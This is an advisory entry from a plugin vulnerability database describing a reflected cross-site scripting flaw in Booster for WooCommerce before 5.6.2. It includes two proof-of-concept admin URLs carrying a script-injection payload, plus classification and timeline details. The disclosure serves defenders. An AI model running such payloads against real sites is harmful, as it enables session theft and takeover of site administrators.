Booster for WooCommerce < 5.6.2 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

v < 5.6.0 https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&a"><script>alert(/XSS/)</script>

v < 5.6.2 (except 5.5.9):

With the Orders module enabled, and "Admin Order Navigation" settings enabled: https://example.com/wp-admin/post.php?post=796&action=edit&a"><script>alert(/XSS/)</script>

Affects Plugins

woocommerce-jetpack

Fixed in 5.6.2

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

f1790084-8c34-423f-90aa-773cb0f1c48d

Timeline

Publicly Published

2022-07-04 (about 3 years ago)

Added

2022-07-04 (about 3 years ago)

Last Updated

2022-07-27 (about 3 years ago)

Other

Published

Title

Published

2025-05-07

Title

Better Search < 4.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-09-20

Title

Polo Video Gallery <= 1.2 - Contributor+ Stored Cross-Site Scripting

Published

2024-10-30

Title

ID-SK Toolkit <= 1.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-21

Title

AffiliateImporterEb <= 1.0.6 - Reflected XSS via Search

Published

2022-07-18

Title

Name Directory < 1.25.5 - Stored Cross-Site Scripting via CSRF